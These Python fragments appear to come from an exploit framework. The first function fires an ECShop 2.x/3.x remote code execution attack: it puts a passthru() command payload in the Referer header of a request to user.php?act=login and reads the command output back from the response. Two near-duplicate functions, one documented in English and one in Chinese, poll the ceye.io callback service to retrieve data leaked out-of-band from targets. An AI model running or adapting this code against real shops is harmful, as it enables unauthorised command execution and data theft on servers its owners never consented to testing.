def _exploit(self, cmd='whoami'):
url = urljoin(self.url, '/user.php?act=login')
phpcode = 'passthru("{0}");'.format(cmd)
# ECShop 2.x payload
ec2payload = self.gen_ec2payload(phpcode)
# ECShop 3.x payload
ec3payload = self.gen_ec3payload(phpcode)
option = self.get_option("version")
if option == "Auto":
payloads = [(ec2payload, '2.x'), (ec3payload, '3.x')]
elif option == "2.x":
payloads = [(ec2payload, '2.x')]
elif option == '3.x':
payloads = [(ec3payload, '3.x')]
# payloads = [ec2payload, ec3payload]
for payload in payloads:
headers = {'Referer': payload[0]}
resp = requests.get(url, headers=headers)
r = get_middle_text(
resp.text, '''<input type="hidden" name="back_act" value="''',
"\n<br />")
if r:
return r
r = get_middle_text(
resp.text, '''<input type="hidden" name="back_act" value="''',
'xxx')
if r:
return r
def exact_request(self, flag, type="request"):
"""
Obtain relevant data by accessing the ceye interface
:param flag: Input flag
:param type: Request type (dns|request), the default is request
:return: Return the acquired data
"""
counts = 3
url = (
"http://api.ceye.io/v1/records?token={token}&type={type}&filter={flag}"
).format(token=self.token, type=type, flag=flag)
while counts:
try:
time.sleep(1)
resp = requests.get(url)
if resp and resp.status_code == 200 and flag in resp.text:
data = json.loads(resp.text)
for item in data["data"]:
name = item.get("name", '')
pro = flag
suffix = flag
t = get_middle_text(name, pro, suffix, 0)
if t:
return t
break
except Exception as ex:
logger.warn(ex)
time.sleep(1)
counts -= 1
return False
def exact_request(self, flag, type="request"):
"""
通过访问ceye接口获取相关数据
:param flag: 输入的flag
:param type: 请求类型(dns|request),默认是request
:return:返回获取的数据
"""
if not self.check_account():
return ""
counts = 3
url = "http://api.ceye.io/v1/records?token={token}&type={type}&filter={flag}".format(
token=self.token, type=type, flag=flag)
while counts:
try:
time.sleep(1)
resp = requests.get(url)
if resp and resp.status_code == 200 and flag in resp.text:
data = json.loads(resp.text)
for item in data["data"]:
name = item.get("name", '')
pro = "/" + flag
suffix = flag
t = get_middle_text(name, pro, suffix, 7 + len(flag))
if t:
return t
break
except Exception as ex:
logger.warn(ex)
time.sleep(1)
counts -= 1
return False